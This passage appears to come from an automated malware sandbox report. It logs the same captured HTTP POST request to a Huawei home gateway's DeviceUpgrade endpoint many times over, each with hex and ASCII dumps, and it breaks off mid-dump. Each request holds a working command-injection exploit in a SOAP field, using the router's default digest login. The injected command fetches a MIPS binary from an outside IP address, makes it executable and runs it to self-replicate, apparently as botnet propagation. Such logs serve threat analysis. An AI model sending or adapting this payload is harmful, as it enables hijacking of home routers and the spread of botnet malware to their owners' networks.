4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 